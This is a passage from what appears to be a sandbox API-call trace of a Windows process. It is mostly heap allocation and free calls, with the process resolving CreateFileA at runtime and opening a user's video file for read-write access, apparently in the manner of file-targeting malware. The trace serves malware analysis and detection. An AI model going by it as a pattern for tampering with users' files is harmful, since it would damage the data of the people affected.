lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.217] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0199.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba1b0 [0199.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba1b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0199.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.218] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0199.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0199.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba1b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0199.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.218] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0199.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0199.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0199.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0199.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0199.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0199.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x45) returned 0x9aa548 [0199.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4", cchWideChar=69, lpMultiByteStr=0x9aa548, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4", lpUsedDefaultChar=0x0) returned 69 [0199.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0199.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0199.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.219] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\c2l5d8zfcqafr.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0199.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0199.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8a) returned 0x8ee038 [0199.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=69, lpWideCharStr=0x8ee038, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4") returned 69 [0199.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0199.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0199.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0199.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0199.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.222] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0199.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0199.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0199.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0199.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.223] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0199.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0199.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0199.224] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0199.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0199.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0199.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0199.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0199.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0199.225] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: 